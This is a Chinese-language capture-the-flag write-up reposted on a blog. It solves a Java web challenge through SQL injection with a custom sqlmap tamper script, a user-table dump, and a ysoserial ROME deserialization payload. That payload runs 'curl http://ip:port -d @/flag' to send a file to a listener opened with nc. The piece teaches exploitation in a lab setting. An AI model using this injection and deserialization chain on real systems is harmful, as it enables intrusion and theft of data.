源檔案代碼審計
這里使用IDEA打開
Test.class
可以看到這里使用了swagger進行介面的測驗,并且在/common/test/sqlDict路徑下發送了POST請求,請求引數為dbName
Row和Table
都是物體類,沒有什么重點
SqlDict.class
可以看到他是用于資料庫連接和查詢的,接受Test傳來的dbName值,并且已知一個資料庫myapp
此時可以對/common/test/sqlDict路徑進行簡單的測驗:
sql注入——sqlmap的tamper撰寫
測驗是否存在sql注入:
那么構造的payload結構是:dbName=myapp# + sql陳述句# 第一個#是用于在java代碼中注釋后面的部分使其能夠正常訪問到資料庫
構造tamper:
#!/usr/bin/env python
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.NORMAL
def dependencies():
pass
def tamper(payload, **kwargs):
result = "myapp#"+payload
return result
然后運行sqlmap進行SQL注入
sqlmap.py -r 1.txt -p dbName --tamper=thinkjava.py -batch -T user --dump
swagger頁面介面測驗
swagger是用于進行后端API介面測驗的,通常需要訪問/swagger-ui.html這個頁面
此時我們可以通過SQL注入獲得的賬戶去測驗登錄介面:
登錄成功后會回傳一串data,rO0AB的開頭,這個就是進行base64加密的序列化內容
將rO0ABXNyABhjbi5hYmMuY29yZS5tb2RlbC5Vc2VyVm92RkMxewT0OgIAAkwAAmlkdAAQTGphdmEvbGFuZy9Mb25nO0wABG5hbWV0ABJMamF2YS9sYW5nL1N0cmluZzt4cHNyAA5qYXZhLmxhbmcuTG9uZzuL5JDMjyPfAgABSgAFdmFsdWV4cgAQamF2YS5sYW5nLk51bWJlcoaslR0LlOCLAgAAeHAAAAAAAAAAAXQABWFkbWlu
轉為16進制:
aced000573720018636e2e6162632e636f72652e6d6f64656c2e55736572566f764643317b04f43a0200024c000269647400104c6a6176612f6c616e672f4c6f6e673b4c00046e616d657400124c6a6176612f6c616e672f537472696e673b78707372000e6a6176612e6c616e672e4c6f6e673b8be490cc8f23df0200014a000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b0200007870000000000000000174000561646d696e
使用SerializationDumper工具查看16進制序列化內容
https://github.com/NickstaDB/SerializationDumper
點擊查看代碼
STREAM_MAGIC - 0xac ed
STREAM_VERSION - 0x00 05
Contents
TC_OBJECT - 0x73
TC_CLASSDESC - 0x72
className
Length - 24 - 0x00 18
Value - cn.abc.core.model.UserVo - 0x636e2e6162632e636f72652e6d6f64656c2e55736572566f
serialVersionUID - 0x76 46 43 31 7b 04 f4 3a
newHandle 0x00 7e 00 00
classDescFlags - 0x02 - SC_SERIALIZABLE
fieldCount - 2 - 0x00 02
Fields
0:
Object - L - 0x4c
fieldName
Length - 2 - 0x00 02
Value - id - 0x6964
className1
TC_STRING - 0x74
newHandle 0x00 7e 00 01
Length - 16 - 0x00 10
Value - Ljava/lang/Long; - 0x4c6a6176612f6c616e672f4c6f6e673b
1:
Object - L - 0x4c
fieldName
Length - 4 - 0x00 04
Value - name - 0x6e616d65
className1
TC_STRING - 0x74
newHandle 0x00 7e 00 02
Length - 18 - 0x00 12
Value - Ljava/lang/String; - 0x4c6a6176612f6c616e672f537472696e673b
classAnnotations
TC_ENDBLOCKDATA - 0x78
superClassDesc
TC_NULL - 0x70
newHandle 0x00 7e 00 03
classdata
cn.abc.core.model.UserVo
values
id
(object)
TC_OBJECT - 0x73
TC_CLASSDESC - 0x72
className
Length - 14 - 0x00 0e
Value - java.lang.Long - 0x6a6176612e6c616e672e4c6f6e67
serialVersionUID - 0x3b 8b e4 90 cc 8f 23 df
newHandle 0x00 7e 00 04
classDescFlags - 0x02 - SC_SERIALIZABLE
fieldCount - 1 - 0x00 01
Fields
0:
Long - L - 0x4a
fieldName
Length - 5 - 0x00 05
Value - value - 0x76616c7565
classAnnotations
TC_ENDBLOCKDATA - 0x78
superClassDesc
TC_CLASSDESC - 0x72
className
Length - 16 - 0x00 10
Value - java.lang.Number - 0x6a6176612e6c616e672e4e756d626572
serialVersionUID - 0x86 ac 95 1d 0b 94 e0 8b
newHandle 0x00 7e 00 05
classDescFlags - 0x02 - SC_SERIALIZABLE
fieldCount - 0 - 0x00 00
classAnnotations
TC_ENDBLOCKDATA - 0x78
superClassDesc
TC_NULL - 0x70
newHandle 0x00 7e 00 06
classdata
java.lang.Number
values
java.lang.Long
values
value
(long)1 - 0x00 00 00 00 00 00 00 01
name
(object)
TC_STRING - 0x74
newHandle 0x00 7e 00 07
Length - 5 - 0x00 05
Value - admin - 0x61646d696e
分析反序列化利用點
使用burp插件java Deserialization Scanner
顯示可以利用ROME
ysoserial反序列化工具使用
工具地址:https://github.com/frohoff/ysoserial/releases
java -jar .\ysoserial-all.jar ROME "curl http://ip:port -d @/flag" > flag.bin
然后記得將flag.bin檔案轉base64編碼,這里附上我的腳本,可以將base64與16進制互相轉換,也可以將bin檔案轉為base64
-r [bin檔案路徑] -base64 [當前編碼為base64] -hex [當前編碼為16進制] -code [需要轉碼的內容]
點擊查看代碼
import base64
import sys
import os
def base64_to_hex(b64):
b64 = b64.replace(' ', '') # Remove spaces
pad_len = len(b64) % 4
if pad_len > 0:
b64 += '='* (4-pad_len)
return base64.b64decode(b64).hex()
def hex_to_base64(hex_str):
byte_string = bytes.fromhex(hex_str)
return base64.b64encode(byte_string).decode()
if __name__ == '__main__':
encode_type = None
code = None
file_path = None
for i in range(1, len(sys.argv)):
if sys.argv[i] == '-code':
code = sys.argv[i+1]
i += 1
elif sys.argv[i] == '-base64':
encode_type = 'base64'
elif sys.argv[i] == '-hex':
encode_type = 'hex'
elif sys.argv[i] == '-r':
file_path = sys.argv[i+1]
i += 1
if encode_type is None and code is None and file_path is None:
print('Usage: python code_convert.py [-base64/-hex] [-r file_path] [-code "code_string"]')
sys.exit(1)
#直接把bin檔案內容轉為base64
if file_path:
with open(os.path.abspath(file_path), 'rb') as f:
code = f.read()
fbase64 = base64.b64encode(code)
print(fbase64)
file.close
else:
if code:
if encode_type == 'base64':
hex_result = base64_to_hex(code)
print(f'Base64 {code} to Hex: {hex_result}')
elif encode_type == 'hex':
b64_result = hex_to_base64(code)
print(f'Hex {code} to Base64: {b64_result}')
if encode_type is None or code is None:
print('Usage: python code_convert.py [-base64/-hex] -code "code_string"')
sys.exit(1)
if encode_type == 'base64':
hex_result = base64_to_hex(code)
print(f'Base64 {code} \n to Hex: {hex_result}')
elif encode_type == 'hex':
b64_result = hex_to_base64(code)
print(f'Hex {code} \n to Base64: {b64_result}')
這里運行:
python3 hex-base64.py -r .\flag.bin
然后遠程主機監聽對應埠
nc -lvp port
再將編碼好的base64編碼(開頭為rO0AB ,記得加上Bearer)放到 /common/user/current 介面運行
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/554071.html
標籤:其他
上一篇:6.1. 網路基礎知識
下一篇:返回列表